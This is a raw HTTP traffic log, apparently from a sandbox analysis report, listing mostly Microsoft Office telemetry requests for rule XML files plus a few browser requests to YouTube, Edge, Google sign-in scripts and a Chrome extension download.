Source: global traffic HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /account HTTP/1.1 | Host: www.youtube.com | Connection: keep-alive | sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | sec-ch-ua-platform: "Windows" | Upgrade-Insecure-Requests: 1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= | Sec-Fetch-Site: none | Sec-Fetch-Mode: navigate | Sec-Fetch-User: ?1 | Sec-Fetch-Dest: document | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1 | Host: api.edgeoffer.microsoft.com | Connection: keep-alive | Sec-Fetch-Site: none | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 | Accept-Encoding: gzip, deflate, br | Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1 | Host: clients2.googleusercontent.com | Connection: keep-alive | Sec-Fetch-Site: none | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 | Accept-Encoding: gzip, deflate, br | Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1 | Connection: Keep-Alive | Accept-Encoding: gzip | User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) | Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_GB.TFQJ3BZDjlM.es5.O/am=iB3MZPgGEBD_8DSgN6BIIGQAAAAAAAAAANAGAACAhwE/d=1/excm=_b,_tp,identifierview/ed=1/dg=0/wt=2/ujg=1/rs=AOaEmlECX2yu9w4ejXqs97RJYrHq6onanQ/m=_b,_tp HTTP/1.1 | Host: www.gstatic.com | Connection: keep-alive | sec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117" | sec-ch-ua-mobile: ?0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | sec-ch-ua-arch: "x86" | sec-ch-ua-full-version: "117.0.5938.132" | sec-ch-ua-platform-version: "10.0.0" | sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132", "Google Chrome";v="117.0.5938.132" | sec-ch-ua-bitness: "64" | sec-ch-ua-model: "" | sec-ch-ua-wow64: ?0 | sec-ch-ua-platform: "Windows" | Accept: */* | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: script | Referer: https://accounts.google.com/ | Accept-Encoding: gzip, deflate, br | Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
